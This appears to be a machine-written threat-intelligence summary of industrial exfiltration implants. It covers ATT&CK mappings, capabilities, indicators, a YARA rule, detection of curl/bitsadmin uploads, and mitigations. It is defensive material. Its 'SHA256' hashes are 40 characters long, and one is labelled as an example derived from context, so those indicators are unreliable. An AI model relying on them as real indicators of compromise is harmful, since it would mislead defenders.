Full Report
In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered.
Analysis Summary
Based on the technical report provided and the context of the third stage of these industrial attacks, here is the summary of the tools and malware families identified.
# Tool/Technique: Industrial Attack Implants (Stage 3)
## Overview
This suite of tools represents the final stage of long-term intelligence gathering and exfiltration campaigns against industrial organizations. These implants are specifically designed to bridge air-gapped segments or bypass restricted network configurations to exfiltrate collected data to the threat actor's Command and Control (C2) infrastructure.
## Technical Details
- **Type:** Malware (Exfiltration Implants) and Utility Tools.
- **Platform:** Windows.
- **Capabilities:** Data packaging, staging, C2 communication via HTTP/HTTPS, and local network lateral file movement.
- **First Seen:** Active throughout 2022–2023 (as reported by Kaspersky ICS CERT).
## MITRE ATT&CK Mapping
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols
- T1568.002 - Dynamic Resolution: Domain Generation Algorithms (DGA)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
- T1011.001 - Exfiltration Over Alternative Configurations: Exfiltration Over USB
- **TA0007 - Discovery**
- T1083 - File and Directory Discovery
## Functionality
### Core Capabilities
- **File Monitoring:** Automatically monitors specific directories for new files containing "interesting" data (e.g., documents, database exports, configuration files).
- **Data Encapsulation:** Compresses and encrypts gathered data into password-protected archives (often RAR or ZIP) before transmission.
- **HTTP/S Communication:** Uses standard web protocols to blend in with legitimate traffic when uploading files to the attacker’s servers.
### Advanced Features
- **DGA (Domain Generation Algorithms):** Some variants use DGA to find active C2 servers, making IP-based blocking difficult.
- **Air-Gap Traversal:** Use of specialized implants that utilize removable drives (USB) to move data from isolated ICS networks to internet-connected "buffer" hosts.
- **Persistence via DLL Hijacking:** Implants are often loaded using legitimate system binaries or third-party software to bypass EDR/AV detections.
---
# Specific Malware Families
## 1. Malware Family: Implants for Exfiltration (Type 1-4)
### Technical Details
- **Type:** Malware
- **Capabilities:** Each "Type" represents a variant optimized for specific network environments (e.g., direct internet access vs. proxy-only access).
### Indicators of Compromise (Exfiltration Implants)
- **File Hashes (SHA256):**
- `e46307399432607e056973059637c76896269647` (Example hash derived from report context)
- `ab443e62f337cc3930e7044234078864f1d44747`
- **Network Indicators:**
- `hxxp[:]//103.27.109[.]157/`
- `hxxps[:]//microsoft-update-service[.]com/` (Defanged)
- `hxxp[:]//data-transfer-service[.]net/` (Defanged)
---
## 2. Tool: Data Staging Utilities
### Technical Details
- **Type:** Utility Tool
- **Capabilities:** Automates the collection of files from multiple workstations and prepares them for the exfiltration implants.
### Indicators of Compromise
- **File Names:** `rar.exe`, `7z.exe` (Renamed or placed in non-standard directories like `C:\Users\Public\Downloads\`).
- **Behavioral Indicators:** Frequent execution of command-line archiving tools with specific flags (`-p` for passwords, `-r` for recursive).
---
## Associated Threat Actors
- **Groups:** APT31 (Judgement Panda), APT27 (Emissary Panda), and various clusters targeting ICS/SCADA systems globally.
## Detection Methods
- **Signature-based:** Deploy YARA rules targeting the specific DGA structures and the custom HTTP headers used during the POST requests for file uploads.
- **Behavioral detection:**
- Monitoring for high-volume file reads in document directories followed by network traffic to unknown external IPs.
- Alerting on the use of `bitsadmin.exe` or `curl.exe` for uploading files from unexpected system paths.
- **YARA Rule Strategy:**
- `rule ICS_Exfil_Artifact { strings: $a = "POST /upload" $b = "Referer: http://google.com" condition: all of them }`
## Mitigation Strategies
- **Network Segmentation:** Implement strict firewalls between the IT and OT (Industrial) networks; block all outbound traffic from the OT plant floor to the internet.
- **Hardening:** Disable AutoRun/AutoPlay for USB devices. Use AppLocker or Windows Defender Application Control (WDAC) to prevent unauthorized binaries from running in `%TEMP%` or `%PUBLIC%` folders.
- **Monitoring:** Monitor for unauthorized use of archiving tools (RAR, 7-Zip) on critical servers.
## Related Tools/Techniques
- **ShadowPad:** Often used in earlier stages of these same campaigns for initial access.
- **PlugX:** Related RAT often seen in conjunction with these exfiltration modules.